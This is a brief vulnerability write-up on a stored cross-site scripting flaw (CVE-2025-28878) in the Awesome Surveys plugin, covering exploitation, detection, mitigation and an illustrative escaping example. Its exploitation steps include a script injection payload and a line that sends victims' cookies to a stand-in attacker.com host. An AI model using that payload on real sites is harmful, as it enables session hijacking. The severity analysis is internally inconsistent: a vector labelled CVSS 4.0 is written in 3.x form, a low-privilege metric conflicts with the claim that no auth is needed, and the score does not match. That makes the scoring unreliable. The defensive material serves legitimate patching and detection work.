How the CVE Works:
CVE-2025-28878 is a stored cross-site scripting (XSS) vulnerability in Awesome Surveys (versions ≤2.0.10): user-supplied input is not properly sanitized during web page generation. An attacker can inject JavaScript payloads into survey fields (e.g., text responses). When an administrator or another user views the compromised survey, the script executes in their browser, enabling session hijacking, defacement, or malware delivery. The root cause is missing output encoding in the survey rendering engine.
DailyCVE Form:
Platform: Awesome Surveys
Version: ≤2.0.10
Vulnerability: Stored XSS
Severity: Critical
Date: 04/09/2025
What Undercode Says:
Exploitation:
1. Payload Injection: Submit a survey response with:
<script>alert(document.cookie)</script>
2. Admin Trigger: Wait for an admin to review submissions via /admin/surveys/view?id=
3. Exfiltrate Data: Use a real-world payload:
fetch('https://attacker.com/steal?data='+btoa(document.cookie))
Detection:
- Scan rendered survey content in the DOM for unencoded script elements (run in the browser console on the survey view page; the check is case-insensitive so `<SCRIPT>` variants are caught too):
document.querySelectorAll('[data-survey-content]').forEach(el => { if (/<script[^>]*>/i.test(el.innerHTML)) console.log('Possible stored XSS in', el); });
Mitigation:
1. Patch: Upgrade to v2.0.11+ which implements DOMPurify.
2. WAF Rule: Block inputs matching:
/<script[^>]*>([\s\S]*?)<\/script>/gi
3. CSP Header (do not allow 'unsafe-inline' in script-src; that would let the injected inline script run):
Content-Security-Policy: default-src 'self'; script-src 'self'
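The defect described above is missing output encoding when stored responses are rendered. The following added example (not Awesome Surveys' own code; the data, field names and function names are constructed for illustration) shows the vulnerable rendering pattern beside the encoded version, plus a defender-side check over the rendered markup:

```javascript
// Added example, not Awesome Surveys' own code. Constructed sample data.
// renderUnsafe() reproduces the bug class in CVE-2025-28878 (stored input
// concatenated into markup); renderSafe() fixes it by HTML-encoding every
// untrusted value at the point of output.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode untrusted text for insertion into an HTML element body or quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => ESCAPES[ch]);
}

// Constructed stored survey responses, as they might sit in the database.
const STORED_RESPONSES = [
  { id: 1, field: 'comment', value: 'Great service, thanks!' },
  { id: 2, field: 'comment', value: '<script>alert(document.cookie)</script>' },
  { id: 3, field: 'name', value: 'O\'Brien "Bob" <bob@example.test>' },
];

// Vulnerable pattern: stored values are dropped straight into the admin view.
function renderUnsafe(responses) {
  return responses
    .map(r => `<tr><td>${r.field}</td><td>${r.value}</td></tr>`)
    .join('\n');
}

// Fixed pattern: every value from storage is encoded before it reaches the page.
function renderSafe(responses) {
  return responses
    .map(r => `<tr><td>${escapeHtml(r.field)}</td><td>${escapeHtml(r.value)}</td></tr>`)
    .join('\n');
}

// Defender-side check: does rendered markup still contain a raw script element?
// Same idea as the advisory's detection scan, applied to server-side output.
function containsRawScript(html) {
  return /<script[^>]*>[\s\S]*?<\/script>/i.test(html);
}

console.log('unsafe render leaks script:', containsRawScript(renderUnsafe(STORED_RESPONSES)));
console.log('safe render leaks script:  ', containsRawScript(renderSafe(STORED_RESPONSES)));
```

Encoding at output (renderSafe) is the durable fix; the WAF regex above only catches one payload shape, and the CSP limits damage if encoding is missed somewhere.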
Analysis:
- CVSS 4.0: `AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H` (9.1 Critical)
- Exploitability: Low complexity; no auth required for submission.
- Impact: Full compromise of admin sessions.
References:
- Patchstack Advisory: PSA-2025-28878
- NVD: CVE-2025-28878
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28878